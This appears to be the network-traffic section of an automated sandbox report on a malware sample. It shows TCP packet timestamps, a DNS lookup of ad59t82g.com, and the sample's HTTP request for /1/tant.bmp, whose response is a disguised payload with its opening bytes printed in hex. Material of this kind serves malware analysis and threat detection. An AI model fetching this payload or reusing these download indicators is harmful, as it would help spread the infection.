Sep 14, 2024 18:31:40.240454912 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.240488052 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.240498066 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.240524054 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.240566969 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.241262913 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.241297007 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.241341114 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.250931025 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.250962019 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.251014948 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.251019001 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.251044035 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.251101971 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.279179096 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.279212952 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.279246092 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.279443979 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.327014923 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.327140093 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.327153921 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.327169895 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.327203035 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.327234983 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.327267885 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.327301979 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.327428102 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.327428102 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.327428102 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.327503920 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.327554941 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.327559948 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.327613115 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.327646971 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.327673912 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.327681065 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.327724934 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.328155994 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328201056 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328249931 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.328250885 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328284025 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328316927 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328326941 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.328367949 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328423023 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328430891 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.328458071 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328494072 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328509092 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.328578949 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328636885 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.328645945 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328679085 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328728914 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.328731060 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328763962 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328797102 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328825951 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.328835011 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328871965 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328881979 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.328903913 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328937054 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.328949928 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.328989983 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.329036951 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.329477072 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.329529047 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.329561949 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.329588890 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.329612970 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.329646111 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.329658985 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.329699039 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.329732895 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.329747915 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.329766989 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.329799891 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.329816103 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.329833031 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.329869986 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.329879999 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.330459118 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.330504894 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.330507994 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.330543041 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.330575943 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.330596924 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.330627918 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.330660105 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.330674887 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.330693960 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.330728054 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.330741882 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.330761909 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.330795050 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.330818892 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.330830097 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.330874920 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.331321955 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.331355095 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.331403971 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.331413984 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.331459045 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.331491947 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.331507921 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.331523895 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.331557035 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.331567049 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.331589937 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.331631899 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.344692945 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.344769955 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.344804049 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.344834089 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.344866991 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.344897985 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.344902039 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.345000029 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.345000029 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.369733095 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.369765997 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.369781971 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.369796991 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.369816065 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.370085955 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.417701960 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.417773008 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.417798042 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.417814016 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.417846918 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.417879105 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.417908907 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.417913914 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.417946100 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.417979956 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.418011904 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.418047905 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.418097019 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.418097019 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.418097019 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.418097019 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.418142080 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.418194056 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.418226004 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.418241978 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.418339968 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.418371916 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.418385029 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.418410063 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.418457031 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.418950081 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.418982029 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419014931 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419027090 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.419048071 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419080973 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419090033 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.419114113 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419147015 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419157982 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.419178963 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419214010 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419214010 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.419265032 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419298887 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419310093 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.419333935 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419403076 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.419446945 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419480085 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419528008 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.419581890 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419634104 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419667959 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419678926 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.419703007 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.419749022 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.420048952 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420082092 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420128107 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.420134068 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420167923 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420201063 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420213938 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.420233011 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420269012 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420295954 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.420298100 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420341015 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.420473099 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420523882 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420557976 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420568943 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.420701981 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420734882 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420749903 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.420769930 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420804977 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.420815945 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.421156883 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.421220064 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.421293974 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.421328068 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.421370029 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.421379089 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.421403885 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.421449900 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.428181887 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428311110 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428359985 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428391933 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428426027 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428428888 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.428428888 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.428478003 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428510904 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428543091 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428544044 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.428581953 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428608894 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.428616047 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428649902 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428664923 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.428683043 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428716898 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428730965 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.428751945 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.428793907 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.429281950 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.429315090 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.429351091 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.429358959 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.429380894 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.429441929 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.429578066 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.429615021 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.429646969 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.429663897 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.429680109 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.429734945 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.429809093 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.429841042 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.429888964 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.429893970 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.429924965 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.429958105 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.429980040 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.429990053 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.430031061 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.430041075 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.430074930 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.430107117 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.430129051 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.430140018 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.430172920 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.430188894 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.430222988 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.430255890 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.430278063 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.430686951 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.430738926 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:40.430804968 CEST	80	49740	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:40.484591007 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:41.751308918 CEST	49741	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:41.756580114 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:41.756686926 CEST	49741	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:43.585002899 CEST	49740	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:47.337352991 CEST	49741	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:47.342528105 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:47.342567921 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:47.342614889 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:47.342648029 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:47.581410885 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:47.582704067 CEST	49741	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:47.587582111 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:59.298732042 CEST	49741	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:59.304691076 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:59.463129997 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:31:59.515744925 CEST	49741	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:59.543032885 CEST	49741	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:31:59.547903061 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:32:15.250242949 CEST	49741	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:32:15.255418062 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:32:15.413552999 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:32:15.468930960 CEST	49741	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:32:15.515043020 CEST	49741	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:32:15.520009995 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:32:33.250274897 CEST	49741	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:32:33.255606890 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:32:33.413877964 CEST	80	49741	45.201.245.153	192.168.2.4
Sep 14, 2024 18:32:33.468950987 CEST	49741	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:32:33.480330944 CEST	49741	80	192.168.2.4	45.201.245.153
Sep 14, 2024 18:32:33.485459089 CEST	80	49741	45.201.245.153	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2024 18:31:05.916450024 CEST	58326	53	192.168.2.4	1.1.1.1
Sep 14, 2024 18:31:06.078049898 CEST	53	58326	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 14, 2024 18:31:05.916450024 CEST	192.168.2.4	1.1.1.1	0x3d6	Standard query (0)	ad59t82g.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 14, 2024 18:31:06.078049898 CEST	1.1.1.1	192.168.2.4	0x3d6	No error (0)	ad59t82g.com		172.67.203.195	A (IP address)	IN (0x0001)	false
Sep 14, 2024 18:31:06.078049898 CEST	1.1.1.1	192.168.2.4	0x3d6	No error (0)	ad59t82g.com		104.21.22.88	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ad59t82g.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	172.67.203.195	80	7572	C:\Users\user\Desktop\N6xnw0iEGs.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 18:31:06.094753027 CEST	73	OUT	GET /1/tant.bmp HTTP/1.1 Host: ad59t82g.com Cache-Control: no-cache
Sep 14, 2024 18:31:06.970772982 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 14 Sep 2024 16:31:06 GMT Content-Type: image/x-ms-bmp Content-Length: 137736 Connection: keep-alive Last-Modified: Sun, 08 Sep 2024 05:18:56 GMT ETag: "66dd33c0-21a08" Cache-Control: max-age=14400 CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uU5KXi7tm1OMVhoxUPflhaB3n1P%2BGcFWwq4ZkdEFttPbLRRdRH4iS9oTeVmnWKchUeDgz0kzV7G%2FvmprZIrjCFTA%2BDrbfdYZo%2BTEMhjh1ZMTd0HrQ8E7CIZpwI5nLPs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c31c3f1a93241e9-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 84 6c 00 00 6c 34 55 89 89 e5 c2 05 93 67 00 00 ed ae ff 19 6e 6c 68 05 6c 6c 00 68 68 6c 00 00 3e 04 c0 1b c4 99 50 e8 69 6c 00 00 ef a8 14 c9 af ed ec 14 6d 6c 00 53 39 3a 57 6a 07 34 6a 65 0a e5 84 24 a0 6c 00 00 5f 81 58 6a 1e 35 6a 6e 37 06 6c 5a 06 5f 66 89 e8 48 ce 00 6c 6c 66 89 e8 48 d4 00 6c 6c 58 6a 5e 0a 89 84 48 b4 00 00 6c 34 6a 2e 0a e5 84 24 b6 6c 00 00 34 06 64 66 e5 e8 24 dc 6c 6c 00 58 e5 c0 24 b0 6c 6c 00 89 00 48 34 89 c0 48 b8 00 6c 6c 89 ac 48 a8 00 00 6c e5 ac 24 d8 6c 00 00 e5 c0 24 ac 6c 6c 00 89 c0 48 e0 00 6c 6c 66 89 e0 48 cc 00 6c 6c 66 89 f0 48 ce 00 6c 6c 66 89 f8 48 d2 00 6c 6c 66 89 e8 48 da 00 6c 6c 66 89 f8 48 